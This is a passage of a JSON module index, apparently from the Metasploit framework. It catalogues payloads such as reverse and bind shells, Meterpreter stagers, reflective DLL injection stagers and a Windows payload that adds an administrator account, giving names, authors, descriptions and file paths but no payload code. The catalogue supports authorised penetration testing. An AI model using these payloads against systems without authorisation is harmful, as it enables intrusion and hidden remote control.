"full_name": "payload/python/meterpreter/reverse_tcp_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre",
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"RageLtMan"
],
"description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Reverse Python connect back stager using SSL",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/python/reverse_tcp_ssl.rb",
"is_install_path": true,
"ref_name": "python/meterpreter/reverse_tcp_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter/reverse_tcp_uuid": {
"name": "Python Meterpreter, Python Reverse TCP Stager with UUID Support",
"full_name": "payload/python/meterpreter/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre",
"OJ Reeves"
],
"description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/python/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "python/meterpreter/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter_bind_tcp": {
"name": "Python Meterpreter Shell, Bind TCP Inline",
"full_name": "payload/python/meterpreter_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Connect to the victim and spawn a Meterpreter shell",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-02-11 15:41:04 +0000",
"path": "/modules/payloads/singles/python/meterpreter_bind_tcp.rb",
"is_install_path": true,
"ref_name": "python/meterpreter_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter_reverse_http": {
"name": "Python Meterpreter Shell, Reverse HTTP Inline",
"full_name": "payload/python/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Connect back to the attacker and spawn a Meterpreter shell",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-02-11 15:41:04 +0000",
"path": "/modules/payloads/singles/python/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "python/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter_reverse_https": {
"name": "Python Meterpreter Shell, Reverse HTTPS Inline",
"full_name": "payload/python/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Connect back to the attacker and spawn a Meterpreter shell",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-02-11 15:41:04 +0000",
"path": "/modules/payloads/singles/python/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "python/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/meterpreter_reverse_tcp": {
"name": "Python Meterpreter Shell, Reverse TCP Inline",
"full_name": "payload/python/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Spencer McIntyre"
],
"description": "Connect back to the attacker and spawn a Meterpreter shell",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-02-11 15:41:04 +0000",
"path": "/modules/payloads/singles/python/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "python/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/shell_bind_tcp": {
"name": "Command Shell, Bind TCP (via python)",
"full_name": "payload/python/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mumbai"
],
"description": "Creates an interactive shell via python, encodes with base64 by design",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-10-23 23:04:02 +0000",
"path": "/modules/payloads/singles/python/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "python/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/shell_reverse_tcp": {
"name": "Command Shell, Reverse TCP (via python)",
"full_name": "payload/python/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.3.3",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/python/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "python/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/shell_reverse_tcp_ssl": {
"name": "Command Shell, Reverse TCP SSL (via python)",
"full_name": "payload/python/shell_reverse_tcp_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Creates an interactive shell via python, uses SSL, encodes with base64 by design.",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb",
"is_install_path": true,
"ref_name": "python/shell_reverse_tcp_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_python/shell_reverse_udp": {
"name": "Command Shell, Reverse UDP (via python)",
"full_name": "payload/python/shell_reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.3.3",
"references": [
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 13:33:36 +0000",
"path": "/modules/payloads/singles/python/shell_reverse_udp.rb",
"is_install_path": true,
"ref_name": "python/shell_reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_r/shell_bind_tcp": {
"name": "R Command Shell, Bind TCP",
"full_name": "payload/r/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Continually listen for a connection and spawn a command shell via R",
"references": [
],
"platform": "R",
"arch": "r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-28 05:30:30 +0000",
"path": "/modules/payloads/singles/r/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "r/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_r/shell_reverse_tcp": {
"name": "R Command Shell, Reverse TCP",
"full_name": "payload/r/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Connect back and create a command shell via R",
"references": [
],
"platform": "R",
"arch": "r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-28 05:30:30 +0000",
"path": "/modules/payloads/singles/r/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "r/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_ruby/shell_bind_tcp": {
"name": "Ruby Command Shell, Bind TCP",
"full_name": "payload/ruby/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Continually listen for a connection and spawn a command shell via Ruby",
"references": [
],
"platform": "Ruby",
"arch": "ruby",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/ruby/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "ruby/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_ruby/shell_bind_tcp_ipv6": {
"name": "Ruby Command Shell, Bind TCP IPv6",
"full_name": "payload/ruby/shell_bind_tcp_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Continually listen for a connection and spawn a command shell via Ruby",
"references": [
],
"platform": "Ruby",
"arch": "ruby",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb",
"is_install_path": true,
"ref_name": "ruby/shell_bind_tcp_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_ruby/shell_reverse_tcp": {
"name": "Ruby Command Shell, Reverse TCP",
"full_name": "payload/ruby/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Connect back and create a command shell via Ruby",
"references": [
],
"platform": "Ruby",
"arch": "ruby",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/ruby/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "ruby/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_ruby/shell_reverse_tcp_ssl": {
"name": "Ruby Command Shell, Reverse TCP SSL",
"full_name": "payload/ruby/shell_reverse_tcp_ssl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan"
],
"description": "Connect back and create a command shell via Ruby, uses SSL",
"references": [
],
"platform": "Ruby",
"arch": "ruby",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb",
"is_install_path": true,
"ref_name": "ruby/shell_reverse_tcp_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_solaris/sparc/shell_bind_tcp": {
"name": "Solaris Command Shell, Bind TCP Inline",
"full_name": "payload/solaris/sparc/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Solaris",
"arch": "sparc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "solaris/sparc/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_solaris/sparc/shell_find_port": {
"name": "Solaris Command Shell, Find Port Inline",
"full_name": "payload/solaris/sparc/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "Solaris",
"arch": "sparc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/solaris/sparc/shell_find_port.rb",
"is_install_path": true,
"ref_name": "solaris/sparc/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_solaris/sparc/shell_reverse_tcp": {
"name": "Solaris Command Shell, Reverse TCP Inline",
"full_name": "payload/solaris/sparc/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Solaris",
"arch": "sparc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "solaris/sparc/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_solaris/x86/shell_bind_tcp": {
"name": "Solaris Command Shell, Bind TCP Inline",
"full_name": "payload/solaris/x86/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Solaris",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "solaris/x86/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_solaris/x86/shell_find_port": {
"name": "Solaris Command Shell, Find Port Inline",
"full_name": "payload/solaris/x86/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "Solaris",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/solaris/x86/shell_find_port.rb",
"is_install_path": true,
"ref_name": "solaris/x86/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_solaris/x86/shell_reverse_tcp": {
"name": "Solaris Command Shell, Reverse TCP Inline",
"full_name": "payload/solaris/x86/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Solaris",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "solaris/x86/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_tty/unix/interact": {
"name": "Unix TTY, Interact with Established Connection",
"full_name": "payload/tty/unix/interact",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Interacts with a TTY on an established socket connection",
"references": [
],
"platform": "Unix",
"arch": "tty",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/tty/unix/interact.rb",
"is_install_path": true,
"ref_name": "tty/unix/interact",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/adduser": {
"name": "Windows Execute net user /ADD",
"full_name": "payload/windows/adduser",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>",
"Chris John Riley",
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Create a new user and add them to local administration group.\n\n Note: The specified password is checked for common complexity\n requirements to prevent the target machine rejecting the user\n for failing to meet policy requirements.\n\n Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/adduser.rb",
"is_install_path": true,
"ref_name": "windows/adduser",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/dllinject/bind_hidden_ipknock_tcp": {
"name": "Reflective DLL Injection, Hidden Bind Ipknock TCP Stager",
"full_name": "payload/windows/dllinject/bind_hidden_ipknock_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_hidden_ipknock_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/bind_hidden_tcp": {
"name": "Reflective DLL Injection, Hidden Bind TCP Stager",
"full_name": "payload/windows/dllinject/bind_hidden_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_hidden_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/bind_ipv6_tcp": {
"name": "Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)",
"full_name": "payload/windows/dllinject/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a DLL via a reflective loader. Listen for an IPv6 connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/bind_ipv6_tcp_uuid": {
"name": "Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/dllinject/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"OJ Reeves"
],
"description": "Inject a DLL via a reflective loader. Listen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/bind_named_pipe": {
"name": "Reflective DLL Injection, Windows x86 Bind Named Pipe Stager",
"full_name": "payload/windows/dllinject/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"UserExistsError"
],
"description": "Inject a DLL via a reflective loader. Listen for a pipe connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-27 19:24:51 +0000",
"path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/bind_nonx_tcp": {
"name": "Reflective DLL Injection, Bind TCP Stager (No NX or Win7)",
"full_name": "payload/windows/dllinject/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject a DLL via a reflective loader. Listen for a connection (No NX)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/bind_tcp": {
"name": "Reflective DLL Injection, Bind TCP Stager (Windows x86)",
"full_name": "payload/windows/dllinject/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a DLL via a reflective loader. Listen for a connection (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/bind_tcp_rc4": {
"name": "Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/dllinject/bind_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Inject a DLL via a reflective loader. Listen for a connection",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/dllinject/bind_tcp_uuid": {
"name": "Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/dllinject/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject a DLL via a reflective loader. Listen for a connection with UUID Support (Windows x86)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/find_tag": {
"name": "Reflective DLL Injection, Find Tag Ordinal Stager",
"full_name": "payload/windows/dllinject/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"skape <mmiller@hick.org>"
],
"description": "Inject a DLL via a reflective loader. Use an established connection",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/findtag_ord.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_hop_http": {
"name": "Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager",
"full_name": "payload/windows/dllinject/reverse_hop_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"scriptjunkie <scriptjunkie@scriptjunkie.us>",
"bannedit <bannedit@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "Inject a DLL via a reflective loader. \n Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n data/hop/hop.php to the PHP server you wish to use as a hop.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_hop_http.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_hop_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_http": {
"name": "Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)",
"full_name": "payload/windows/dllinject/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>"
],
"description": "Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-08 06:24:02 +0000",
"path": "/modules/payloads/stagers/windows/reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_http_proxy_pstore": {
"name": "Reflective DLL Injection, Reverse HTTP Stager Proxy",
"full_name": "payload/windows/dllinject/reverse_http_proxy_pstore",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>"
],
"description": "Inject a DLL via a reflective loader. Tunnel communication over HTTP",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_http_proxy_pstore",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/dllinject/reverse_ipv6_tcp": {
"name": "Reflective DLL Injection, Reverse TCP Stager (IPv6)",
"full_name": "payload/windows/dllinject/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Inject a DLL via a reflective loader. Connect back to the attacker over IPv6",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
